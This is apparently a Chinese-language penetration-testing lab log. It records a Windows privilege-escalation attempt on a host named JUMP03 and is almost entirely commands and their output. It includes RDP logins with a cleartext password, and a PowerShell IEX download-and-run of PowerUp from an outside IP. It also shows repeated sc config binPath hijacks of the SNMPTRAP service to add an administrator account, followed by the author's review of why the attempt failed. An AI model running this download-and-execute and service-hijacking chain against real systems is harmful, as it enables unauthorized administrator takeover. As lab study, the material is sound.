rdesktop远程登录:
proxychains4 rdesktop -u nina -p Passw0rd! 172.16.243.183
出现如下错误:
Core(error): tcp_send(), gnutls_record_send() failed with -53: Error in the push function.
Disconnected due to network error, exiting...
disconnect: Unknown reason.
换成:xfreerdp
proxychains4 xfreerdp /u:nina /p:Passw0rd! /v:172.16.243.183
PowerUp查找可能的提权脆弱点:https://michmich.eu/Cheatsheets/internal/03-lpe-windows/
C:\\Users\\nina\\Desktop>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\\Users\\nina\\Desktop> **IEX((New-Object System.Net.WebClient).DownloadString('<http://192.168.49.243/PowerUp.ps1>'))**
PS C:\\Users\\nina\\Desktop> **Invoke-AllChecks
[*] Checking service permissions...
ServiceName : SNMPTRAP
Path : C:\\Windows\\System32\\snmptrap.exe
StartName : NT AUTHORITY\\LocalService
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart : True**
PS C:\\Users\\nina\\Desktop> Invoke-ServiceAbuse -Name 'SNMPTRAP'
ServiceDetails.Name : The term 'ServiceDetails.Name' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1795 char:43
+ Write-Verbose "Service '$(ServiceDetails.Name)' disab ...
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (ServiceDetails.Name:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
ServiceAbused Command
------------- -------
**SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add**
C:\\Users\\nina\\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
**START_TYPE : 4 DISABLED**
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\\Windows\\System32\\snmptrap.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\\LocalService
C:\\Users\\nina\\Desktop>sc config "SNMPTRAP" binPath="cmd.exe /c net user crack Passw0rd! /add && net localgroup Administrators crack /add"
[SC] ChangeServiceConfig SUCCESS
C:\\Users\\nina\\Desktop>sc stop "SNMPTRAP"
[SC] ControlService FAILED 1062:
The service has not been started.
C:\\Users\\nina\\Desktop>sc start "SNMPTRAP"
[SC] StartService FAILED 1058:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
C:\\Users\\nina\\Desktop>
C:\\Users\\nina\\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\\Windows\\System32\\snmptrap.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\\LocalService
C:\\Users\\nina\\Desktop>sc config "SNMPTRAP" binpath= "cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add"
[SC] ChangeServiceConfig SUCCESS
C:\\Users\\nina\\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
**START_TYPE : 4 DISABLED**
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\\LocalService
C:\\Users\\nina\\Desktop>**sc config SNMPTRAP start=auto**
[SC] ChangeServiceConfig SUCCESS
C:\\Users\\nina\\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
**START_TYPE : 2 AUTO_START**
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\\LocalService
C:\\Users\\nina\\Desktop>sc start SNMPTRAP
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
提权这一块的复盘:
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Users\\nina>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
**START_TYPE : 4 DISABLED //这里需要改成auto,不然PowerUp提权会报错**
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\\Windows\\System32\\snmptrap.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\\LocalService
看一下,不改的结果:
PS C:\\Users\\nina\\Desktop> **Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'**
*ServiceDetails.Name : The term 'ServiceDetails.Name' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1795 char:43
+ Write-Verbose "Service '$(ServiceDetails.Name)' disab ...
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (ServiceDetails.Name:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException*
ServiceAbused Command
------------- -------
SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add
PS C:\\Users\\nina\\Desktop> net users
User accounts for \\\\JUMP03
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
The command completed successfully.
可以看见 Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'
执行报错,并且用户添加失败。
修改START_TYPE为auto:
C:\\Users\\nina>**sc config SNMPTRAP start=auto**
[SC] ChangeServiceConfig SUCCESS
C:\\Users\\nina>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\\Windows\\System32\\snmptrap.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\\LocalService
可以看见 Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'
执行不报错,但是用户添加依旧失败。
PS C:\\Users\\nina\\Desktop> **Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'**
ServiceAbused Command
------------- -------
SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add
PS C:\\Users\\nina\\Desktop> net users
User accounts for \\\\JUMP03
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
The command completed successfully.